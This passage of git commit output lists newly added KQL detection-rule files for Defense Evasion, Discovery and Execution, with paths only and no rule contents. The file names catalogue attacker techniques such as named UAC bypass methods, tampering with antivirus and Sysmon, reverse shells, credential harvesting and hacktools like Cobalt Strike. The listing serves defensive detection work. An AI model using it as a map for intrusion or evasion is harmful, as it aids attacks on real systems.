mode 100644 KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql create mode 100644 KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql create mode 100644 KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql create mode 100644 KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql create mode 100644 KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql create mode 100644 KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql create mode 100644 KQL/rules/Defense Evasion/taskmgr_as_local_system.kql create mode 100644 KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql create mode 100644 KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql create mode 100644 KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql create mode 100644 KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql create mode 100644 KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql create mode 100644 KQL/rules/Defense Evasion/touch_suspicious_service_file.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_default_lockfile.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_execve_hijack.kql create mode 100644 KQL/rules/Defense Evasion/triple_cross_ebpf_rootkit_install_commands.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_abusing_winsat_path_parsing_registry.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_tools_using_computerdefaults.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_changepk_and_slui.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_consent_and_comctl32_file.kql create mode 100644 KQL/rules/Defense 
Evasion/uac_bypass_using_consent_and_comctl32_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_disk_cleanup.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_dismhost.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_event_viewer_recentviews.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_eventvwr.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ieinstal_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_iscsicpl_imageload.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_msconfig_token_modification_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_net_code_profiler_on_mmc.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_ntfs_reparse_point_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_pkgmgr_and_dism.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_file.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_process.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_using_windows_media_player_registry.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_event_viewer.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_icmluautil.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_sdclt.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_windows_firewall_snap_in_hijack.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_via_wsreset.kql create mode 100644 KQL/rules/Defense Evasion/uac_bypass_wsreset.kql create mode 100644 KQL/rules/Defense 
Evasion/ufw_force_stop_using_ufw_init.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_defaultpack_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_child_process_spawned_by_odbcconf_exe.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql create mode 100644 KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql create mode 100644 KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql create mode 100644 KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql create mode 100644 KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql create mode 100644 KQL/rules/Defense Evasion/use_of_remote_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql create mode 100644 
KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql create mode 100644 KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_wfc_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_short_name_path_in_image.kql create mode 100644 KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql create mode 100644 KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql create mode 100644 KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql create mode 100644 KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql create mode 100644 KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql create mode 100644 KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql create mode 100644 KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql create mode 100644 KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql create mode 100644 KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql create mode 100644 KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql create mode 100644 KQL/rules/Defense 
Evasion/windows_processes_suspicious_parent_directory.kql create mode 100644 KQL/rules/Defense Evasion/winget_admin_settings_modification.kql create mode 100644 KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql create mode 100644 KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql create mode 100644 KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql create mode 100644 KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql create mode 100644 KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql create mode 100644 KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql create mode 100644 KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql create mode 100644 KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql create mode 100644 KQL/rules/Discovery/advanced_ip_scanner_file_event.kql create mode 100644 KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/bloodhound_collection_files.kql create mode 100644 KQL/rules/Discovery/capabilities_discovery_linux.kql create mode 100644 KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql create mode 100644 KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql create mode 100644 KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql create mode 100644 KQL/rules/Discovery/crontab_enumeration.kql create mode 100644 KQL/rules/Discovery/detected_windows_software_discovery.kql create mode 100644 KQL/rules/Discovery/dirlister_execution.kql create mode 100644 KQL/rules/Discovery/discovery_of_a_system_time.kql 
create mode 100644 KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql create mode 100644 KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql create mode 100644 KQL/rules/Discovery/driverquery_exe_execution.kql create mode 100644 KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql create mode 100644 KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/file_and_directory_discovery_linux.kql create mode 100644 KQL/rules/Discovery/file_and_directory_discovery_macos.kql create mode 100644 KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql create mode 100644 KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql create mode 100644 KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/fsutil_drive_enumeration.kql create mode 100644 KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql create mode 100644 KQL/rules/Discovery/gpresult_display_group_policy_information.kql create mode 100644 KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql create mode 100644 KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_certify_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_certipy_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpview_execution.kql create 
mode 100644 KQL/rules/Discovery/hacktool_soaphound_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_trufflesnout_execution.kql create mode 100644 KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql create mode 100644 KQL/rules/Discovery/linux_remote_system_discovery.kql create mode 100644 KQL/rules/Discovery/local_accounts_discovery.kql create mode 100644 KQL/rules/Discovery/local_groups_discovery_linux.kql create mode 100644 KQL/rules/Discovery/local_groups_discovery_macos.kql create mode 100644 KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/local_system_accounts_discovery_linux.kql create mode 100644 KQL/rules/Discovery/local_system_accounts_discovery_macos.kql create mode 100644 KQL/rules/Discovery/macos_network_service_scanning.kql create mode 100644 KQL/rules/Discovery/macos_remote_system_discovery.kql create mode 100644 KQL/rules/Discovery/network_reconnaissance_activity.kql create mode 100644 KQL/rules/Discovery/network_sniffing_macos.kql create mode 100644 KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/nltest_exe_execution.kql create mode 100644 KQL/rules/Discovery/notepad_password_files_discovery.kql create mode 100644 KQL/rules/Discovery/obfuscated_ip_download_activity.kql create mode 100644 KQL/rules/Discovery/obfuscated_ip_via_cli.kql create mode 100644 KQL/rules/Discovery/os_architecture_discovery_via_grep.kql create mode 100644 KQL/rules/Discovery/permission_check_via_accesschk_exe.kql create mode 100644 KQL/rules/Discovery/pktmon_exe_execution.kql create mode 100644 KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql create mode 100644 KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql create mode 100644 
KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql create mode 100644 KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql create mode 100644 KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql create mode 100644 KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql create mode 100644 KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql create mode 100644 KQL/rules/Discovery/pua_adfind_suspicious_execution.kql create mode 100644 KQL/rules/Discovery/pua_adidnsdump_execution.kql create mode 100644 KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql create mode 100644 KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql create mode 100644 KQL/rules/Discovery/pua_crassus_execution.kql create mode 100644 KQL/rules/Discovery/pua_nmap_zenmap_execution.kql create mode 100644 KQL/rules/Discovery/pua_seatbelt_execution.kql create mode 100644 KQL/rules/Discovery/pua_softperfect_netscan_execution.kql create mode 100644 KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql create mode 100644 KQL/rules/Discovery/pua_trufflehog_execution.kql create mode 100644 KQL/rules/Discovery/pua_trufflehog_execution_linux.kql create mode 100644 KQL/rules/Discovery/python_initiated_connection.kql create mode 100644 KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql create mode 100644 KQL/rules/Discovery/renamed_whoami_execution.kql create mode 100644 KQL/rules/Discovery/sam_registry_hive_handle_request.kql create mode 100644 KQL/rules/Discovery/security_software_discovery_linux.kql create mode 100644 KQL/rules/Discovery/security_software_discovery_macos.kql create mode 100644 
KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql create mode 100644 KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql create mode 100644 KQL/rules/Discovery/shell_execution_gcc_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_find_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_flock_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_nice_linux.kql create mode 100644 KQL/rules/Discovery/shell_invocation_via_apt_linux.kql create mode 100644 KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql create mode 100644 KQL/rules/Discovery/suspicious_execution_of_hostname.kql create mode 100644 KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql create mode 100644 KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql create mode 100644 KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql create mode 100644 KQL/rules/Discovery/suspicious_network_command.kql create mode 100644 KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql create mode 100644 KQL/rules/Discovery/suspicious_query_of_machineguid.kql create mode 100644 KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql create mode 100644 KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql create mode 100644 KQL/rules/Discovery/suspicious_use_of_psloglist.kql create mode 100644 KQL/rules/Discovery/suspicious_where_execution.kql create mode 100644 KQL/rules/Discovery/syskey_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql create mode 100644 KQL/rules/Discovery/system_information_discovery.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_using_ioreg.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql create 
mode 100644 KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql create mode 100644 KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql create mode 100644 KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_linux.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_macos.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql create mode 100644 KQL/rules/Discovery/system_network_discovery_linux.kql create mode 100644 KQL/rules/Discovery/system_network_discovery_macos.kql create mode 100644 KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql create mode 100644 KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/use_of_w32tm_as_timer.kql create mode 100644 KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql create mode 100644 KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql create mode 100644 KQL/rules/Discovery/whoami_as_parameter.kql create mode 100644 KQL/rules/Discovery/whoami_exe_execution_anomaly.kql create mode 100644 KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql create mode 100644 KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql create mode 100644 KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql create mode 100644 KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql create mode 100644 KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql create mode 100644 KQL/rules/Execution/application_removed_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/application_terminated_via_wmic_exe.kql create mode 100644 
KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql create mode 100644 KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql create mode 100644 KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql create mode 100644 KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql create mode 100644 KQL/rules/Execution/base64_mz_header_in_commandline.kql create mode 100644 KQL/rules/Execution/bash_interactive_shell.kql create mode 100644 KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql create mode 100644 KQL/rules/Execution/bpftrace_unsafe_option_usage.kql create mode 100644 KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql create mode 100644 KQL/rules/Execution/capsh_shell_invocation_linux.kql create mode 100644 KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql create mode 100644 KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql create mode 100644 KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql create mode 100644 KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql create mode 100644 KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql create mode 100644 KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql create mode 100644 KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql create mode 100644 KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql create mode 100644 KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql create mode 100644 KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql create mode 100644 KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql create mode 100644 
KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql create mode 100644 KQL/rules/Execution/csexec_service_file_creation.kql create mode 100644 KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql create mode 100644 KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql create mode 100644 KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql create mode 100644 KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql create mode 100644 KQL/rules/Execution/enable_bpf_kprobes_tracing.kql create mode 100644 KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql create mode 100644 KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql create mode 100644 KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql create mode 100644 KQL/rules/Execution/execute_code_with_pester_bat.kql create mode 100644 KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql create mode 100644 KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql create mode 100644 KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql create mode 100644 KQL/rules/Execution/file_decryption_using_gpg4win.kql create mode 100644 KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql create mode 100644 KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql create mode 100644 KQL/rules/Execution/file_encryption_using_gpg4win.kql create mode 100644 KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql create mode 100644 KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql create mode 100644 KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql create mode 100644 KQL/rules/Execution/forfiles_command_execution.kql create mode 100644 
KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql create mode 100644 KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql create mode 100644 KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql create mode 100644 KQL/rules/Execution/hacktool_crackmapexec_execution.kql create mode 100644 KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql create mode 100644 KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql create mode 100644 KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql create mode 100644 KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql create mode 100644 KQL/rules/Execution/hacktool_koadic_execution.kql create mode 100644 KQL/rules/Execution/hacktool_pchunter_execution.kql create mode 100644 KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql create mode 100644 KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql create mode 100644 KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql create mode 100644 KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql create mode 100644 KQL/rules/Execution/hacktool_stracciatella_execution.kql create mode 100644 KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql create mode 100644 KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql create mode 100644 KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql create mode 100644 KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql create mode 100644 KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql create mode 100644 KQL/rules/Execution/insecure_transfer_via_curl_exe.kql create mode 100644 KQL/rules/Execution/installation_of_wsl_kali_linux.kql create mode 100644 
KQL/rules/Execution/interactive_bash_suspicious_children.kql create mode 100644 KQL/rules/Execution/jamf_mdm_execution.kql create mode 100644 KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql create mode 100644 KQL/rules/Execution/java_running_with_remote_debugging.kql create mode 100644 KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql create mode 100644 KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql create mode 100644 KQL/rules/Execution/linux_hacktool_execution.kql create mode 100644 KQL/rules/Execution/linux_reverse_shell_indicator.kql create mode 100644 KQL/rules/Execution/local_file_read_using_curl_exe.kql create mode 100644 KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql create mode 100644 KQL/rules/Execution/macos_scripting_interpreter_applescript.kql create mode 100644 KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql create mode 100644 KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql create mode 100644 KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql create mode 100644 KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql create mode 100644 KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql create mode 100644 KQL/rules/Execution/mmc20_lateral_movement.kql create mode 100644 KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql create mode 100644 KQL/rules/Execution/mmc_loading_script_engines_dlls.kql create mode 100644 KQL/rules/Execution/named_pipe_created_via_mkfifo.kql create mode 100644 KQL/rules/Execution/net_webclient_casing_anomalies.kql create mode 100644 KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql create mode 100644 KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql create mode 100644 KQL/rules/Execution/new_application_in_appcompat.kql create mode 100644 
KQL/rules/Execution/new_process_created_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql create mode 100644 KQL/rules/Execution/nodejs_execution_of_javascript_file.kql create mode 100644 KQL/rules/Execution/nohup_execution.kql create mode 100644 KQL/rules/Execution/non_interactive_powershell_process_spawned.kql create mode 100644 KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql create mode 100644 KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql create mode 100644 KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql create mode 100644 KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql create mode 100644 KQL/rules/Execution/osacompile_run_only_execution.kql create mode 100644 KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql create mode 100644 KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql create mode 100644 KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql create mode 100644 KQL/rules/Execution/pcre_net_package_image_load.kql create mode 100644 KQL/rules/Execution/pcre_net_package_temp_files.kql create mode 100644 KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql create mode 100644 KQL/rules/Execution/perl_inline_command_execution.kql create mode 100644 KQL/rules/Execution/php_inline_command_execution.kql create mode 100644 KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql create mode 100644 KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql create mode 100644 KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql create mode 100644 KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql create mode 100644 KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql create mode 100644 
KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql create mode 100644 KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql create mode 100644 KQL/rules/Execution/potential_cookies_session_hijacking.kql create mode 100644 KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql create mode 100644 KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql create mode 100644 KQL/rules/Execution/potential_dosfuscation_activity.kql create mode 100644 KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql create mode 100644 KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql create mode 100644 KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql create mode 100644 KQL/rules/Execution/potential_perl_reverse_shell_execution.kql create mode 100644 KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql create mode 100644 KQL/rules/Execution/potential_php_reverse_shell.kql create mode 100644 KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql create mode 100644 KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql create mode 100644 KQL/rules/Execution/potential_powershell_reverseshell_connection.kql create mode 100644 KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql create mode 100644 KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql create mode 100644 KQL/rules/Execution/potential_renamed_rundll32_execution.kql create mode 100644 KQL/rules/Execution/potential_ruby_reverse_shell.kql create mode 100644 KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql create mode 100644 
